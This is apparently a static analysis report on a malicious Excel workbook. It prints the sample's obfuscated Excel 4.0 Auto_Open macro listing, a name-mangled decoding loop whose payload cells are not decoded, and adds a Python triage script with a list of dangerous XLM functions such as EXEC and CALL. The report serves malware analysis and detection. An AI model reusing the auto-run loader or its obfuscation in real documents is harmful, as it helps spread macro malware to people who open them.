Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bc8846bab60be2f…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-27 11:40:01
Authoring application: Microsoft Excel
First seen: 2021-02-23
MD5: f97bd93f2fd9736d4ee696938059a103
SHA-1: 173fa67e84eb8ff1f461f766dd01ac4db15cec9d
SHA-256: 5bc8846bab60be2f30841425657add7369662b999173853b092490fe41920389
Risk score: 142

Heuristics (4)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. In BIFF a built-in defined name such as Auto_Open is stored in the Lbl (NAME, record 0x0018) record as a one-byte identifier rather than as the literal string, which is why the listing shows it as "built-in-name 1 Auto_Open" and why a plain byte-string search of the workbook for "Auto_Open" can miss it. The recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with XLM formula functions that can invoke programs, write files or transfer control, so the workbook can run a payload without any VBA project.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream (a BOUNDSHEET record of type "Excel 4.0 macro sheet"). XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from this sample matched static suspicious-content checks (script obfuscation, encoded payload blobs, packed data, or execution/download terms).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6861 bytes
SHA-256: c6645f91586f65bf70f7d55814f4bcf311810987650b7d176cc919b6ef9dd342
Detection
ClamAV: No threats found
Obfuscation or payload: likely
18 of 36 identifiers look randomly generated (e.g. 'bJDQdXVrOEeG'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  uTChJkpypm
' 0018     26 LABEL : Cell Value, String Constant - abCkXJaQlyw len=0 
' 0018     20 LABEL : Cell Value, String Constant - aHEPZ len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C183 
' 0018     27 LABEL : Cell Value, String Constant - bJDQdXVrOEeG len=0 
' 0018     23 LABEL : Cell Value, String Constant - CaBwHupX len=0 
' 0018     23 LABEL : Cell Value, String Constant - CBfwSwfo len=0 
' 0018     23 LABEL : Cell Value, String Constant - CkhFuzPr len=0 
' 0018     23 LABEL : Cell Value, String Constant - dkOsKTcY len=0 
' 0018     20 LABEL : Cell Value, String Constant - fRNGq len=0 
' 0018     24 LABEL : Cell Value, String Constant - fzctLcpBC len=0 
' 0018     23 LABEL : Cell Value, String Constant - JLSzfuJl len=0 
' 0018     24 LABEL : Cell Value, String Constant - oPckrtPka len=0 
' 0018     26 LABEL : Cell Value, String Constant - oWTotSrZDsh len=0 
' 0018     21 LABEL : Cell Value, String Constant - PDlIgX len=0 
' 0018     23 LABEL : Cell Value, String Constant - RLllweSB len=0 
' 0018     24 LABEL : Cell Value, String Constant - SUDeLEDrz len=0 
' 0018     23 LABEL : Cell Value, String Constant - TEXuQDPG len=0 
' 0018     20 LABEL : Cell Value, String Constant - VlmgB len=0 
' 0018     20 LABEL : Cell Value, String Constant - vMbdK len=0 
' 0018     21 LABEL : Cell Value, String Constant - vWkzyM len=0 
' 0018     23 LABEL : Cell Value, String Constant - ZNngvxOb len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  uTChJkpypm,S63,"",595.00000000000000000000
'  uTChJkpypm,S64,"",428.00000000000000000000
'  uTChJkpypm,S65,"",311.00000000000000000000
'  uTChJkpypm,S66,"",-407.00000000000000000000
'  uTChJkpypm,S67,"",-12.00000000000000000000
'  uTChJkpypm,S68,"",-479.00000000000000000000
'  uTChJkpypm,C90,"SET.NAME("abCkXJaQlyw",0+VALUE("0"))",""
'  uTChJkpypm,C92,"SET.NAME("oPckrtPka",abCkXJaQlyw)",""
'  uTChJkpypm,C94,"SET.NAME("CaBwHupX",abCkXJaQlyw)",""
'  uTChJkpypm,C97,"SET.NAME("TEXuQDPG",COUNTA(vWkzyM))",""
'  uTChJkpypm,C99,"SET.NAME("CkhFuzPr",COUNTA(vMbdK))",""
'  uTChJkpypm,C101,[],""
'  uTChJkpypm,C105,"SET.NAME("CBfwSwfo","")",""
'  uTChJkpypm,C110,"oPckrtPka",""
'  uTChJkpypm,C114,"SET.NAME("JLSzfuJl",HLOOKUP("*",vWkzyM,oPckrtPka,FALSE))",""
'  uTChJkpypm,C119,"dkOsKTcY",""
'  uTChJkpypm,C123,"SET.NAME("bJDQdXVrOEeG",abCkXJaQlyw)",""
'  uTChJkpypm,C128,[],""
'  uTChJkpypm,C133,"bJDQdXVrOEeG",""
'  uTChJkpypm,C137,"oWTotSrZDsh",""
'  uTChJkpypm,C140,"PDlIgX",""
'  uTChJkpypm,C144,"RLllweSB",""
'  uTChJkpypm,C146,"SET.NAME("aHEPZ",VALUE(HLOOKUP("*",vMbdK,RLllweSB,FALSE)))",""
'  uTChJkpypm,C149,"SUDeLEDrz",""
'  uTChJkpypm,C154,"CBfwSwfo",""
'  uTChJkpypm,C156,"CaBwHupX",""
'  uTChJkpypm,C161,NEXT(),""
'  uTChJkpypm,C165,"ZNngvxOb",""
'  uTChJkpypm,C170,[],""
'  uTChJkpypm,C174,"VlmgB",""
'  uTChJkpypm,C178,NEXT(),""
'  uTChJkpypm,C180,RETURN(),""
'  uTChJkpypm,C201,"SET.NAME("fzctLcpBC",C90)",""
'  uTChJkpypm,C206,"vWkzyM",""
'  uTChJkpypm,C211,"SET.NAME("vMbdK",R55C12)",""
'  uTChJkpypm,C216,"SET.NAME("VlmgB",224)",""
'  uTChJkpypm,C220,"SET.NAME("fRNGq",3)",""
'  uTChJkpypm,C223,fzctLcpBC(),""
'  uTChJkpypm,C224,HALT(),""
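
The listing above is what an analyst actually has to work from, so the checks behind the four heuristics and the "identifiers look randomly generated" note can be reproduced directly on it. The script below is an added example for this report, not the analyzer that produced it and not part of oletools: it parses the xlm_macros.txt format that olevba's extract_all_macros emits (the BOUNDSHEET line for the macro sheet, the 0x0018 Lbl records carrying defined names and the built-in Auto_Open name, and the Sheet,Reference,Formula,Value rows) and reports macro-sheet presence, the auto-exec entry and its target, any formula cell calling a dangerous XLM function, cells whose formula is shown only as [] and was therefore not decoded in the listing, and the share of identifiers that look machine-generated. The dangerous-function list and the randomness heuristic are this example's own assumptions; the embedded sample is a constructed excerpt of the listing on this page, and the extra Macro1!A1 row is a constructed line used only to exercise the dangerous-call check.

```python
"""Triage an olevba XLM macro listing (xlm_macros.txt format).

Added example: not the report's analyzer and not part of oletools. The
dangerous-function list and the randomness test are assumptions made here.
"""
import re
import sys

# Constructed excerpt of the listing shown in the report.
SAMPLE_LISTING = """' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  uTChJkpypm
' 0018     26 LABEL : Cell Value, String Constant - abCkXJaQlyw len=0
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C183
' 0018     27 LABEL : Cell Value, String Constant - bJDQdXVrOEeG len=0
' 0018     23 LABEL : Cell Value, String Constant - CaBwHupX len=0
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  uTChJkpypm,S63,"",595.00000000000000000000
'  uTChJkpypm,C90,"SET.NAME("abCkXJaQlyw",0+VALUE("0"))",""
'  uTChJkpypm,C101,[],""
'  uTChJkpypm,C114,"SET.NAME("JLSzfuJl",HLOOKUP("*",vWkzyM,oPckrtPka,FALSE))",""
'  uTChJkpypm,C161,NEXT(),""
'  uTChJkpypm,C180,RETURN(),""
'  uTChJkpypm,C224,HALT(),""
"""
# Constructed row (not from the report) so the dangerous-call check can fire.
CONSTRUCTED_EXEC_ROW = "'  Macro1,A1,\"EXEC(A2)\",\"\""

# XLM functions that launch programs, touch files or transfer control.
# Assumed list for this example; extend it to your own policy.
DANGEROUS_XLM = {
    "CALL", "EXEC", "REGISTER", "REGISTER.ID", "RUN", "FOPEN", "FWRITE",
    "FWRITELN", "FREAD", "FREADLN", "FCLOSE", "FORMULA", "FORMULA.FILL",
    "FORMULA.ARRAY", "SEND.KEYS",
}

MACRO_SHEET_RE = re.compile(r"Excel 4\.0 macro sheet, (.+?) -\s+(\S+)")
# Record 0x0018 is the BIFF Lbl (defined NAME) record; built-in names such as
# Auto_Open are stored as a one-byte id, which the dump resolves for us.
AUTO_NAME_RE = re.compile(
    r"built-in-name\s+\d+\s+(Auto_(?:Open|Close|Activate|Deactivate))"
    r"\s+len=\d+\s+(\S+)\s+(\S+)"
)
LABEL_NAME_RE = re.compile(r"String Constant - (?!built-in-name)(\S+) len=\d+")
CSV_ROW_RE = re.compile(r"^'\s+(\S+),([A-Z]+\d+),(.*),(\"[^\"]*\"|\S+)$")
FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")


def parse_listing(text):
    """Pull macro sheets, auto-exec names, defined names and cells out of the dump."""
    parsed = {"macro_sheets": [], "auto_exec": [], "names": [], "cells": []}
    for line in text.splitlines():
        m = MACRO_SHEET_RE.search(line)
        if m:
            parsed["macro_sheets"].append({"name": m.group(2), "visibility": m.group(1)})
            continue
        m = AUTO_NAME_RE.search(line)
        if m:
            parsed["auto_exec"].append({"name": m.group(1), "ptg": m.group(2), "target": m.group(3)})
            continue
        m = LABEL_NAME_RE.search(line)
        if m:
            parsed["names"].append(m.group(1))
            continue
        m = CSV_ROW_RE.match(line)
        if m:
            sheet, ref, formula, value = m.groups()
            if len(formula) >= 2 and formula[0] == formula[-1] == '"':
                formula = formula[1:-1]  # unwrap the quoted formula column
            parsed["cells"].append({"sheet": sheet, "ref": ref, "formula": formula,
                                    "value": value.strip('"')})
    return parsed


def looks_random(name):
    """Crude name-mangling test (assumption): almost no vowels, or the case
    flips more often than every other letter. CamelCase words stay below it."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    vowel_ratio = sum(c.lower() in "aeiou" for c in letters) / len(letters)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return vowel_ratio < 0.2 or flips / len(letters) > 0.5


def triage(text):
    """Apply the report's checks to one listing and return the findings."""
    parsed = parse_listing(text)
    dangerous, undecoded = [], []
    for cell in parsed["cells"]:
        if cell["formula"] == "[]":          # formula not decoded in the listing
            undecoded.append(cell["ref"])
            continue
        for fn in FUNC_RE.findall(cell["formula"]):
            if fn in DANGEROUS_XLM:
                dangerous.append((cell["sheet"], cell["ref"], fn))
    identifiers = sorted(set(parsed["names"]) | {s["name"] for s in parsed["macro_sheets"]})
    random_names = [n for n in identifiers if looks_random(n)]
    if parsed["auto_exec"]:
        verdict = "critical"                 # XLM auto-exec entry, as the report rates it
    elif parsed["macro_sheets"]:
        verdict = "medium"                   # macro sheet present, no auto-exec seen
    else:
        verdict = "none"
    return {
        "macro_sheets": [s["name"] for s in parsed["macro_sheets"]],
        "auto_exec": parsed["auto_exec"],
        "dangerous_calls": dangerous,
        "undecoded_cells": undecoded,
        "random_names": random_names,
        "random_ratio": len(random_names) / len(identifiers) if identifiers else 0.0,
        "verdict": verdict,
    }


def main(argv):
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_LISTING
    for key, value in triage(text).items():
        print(f"{key}: {value}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python xlm_triage.py xlm_macros.txt` against the carved artifact, or with no argument to see the result for the embedded excerpt. The undecoded_cells list matters in practice: the preview on this page shows C101, C128 and C170 as [], so the functions that triggered OLE_XLM_DANGEROUS_FN need not be visible in the listing, and a listing-only scan that reports no dangerous call is not evidence that none exists. The random-name ratio is only a rough stand-in for the report's own 18-of-36 figure; the point is that a macro sheet whose defined names are all high-entropy strings with zero-length contents is itself a signal, independent of what the formulas do.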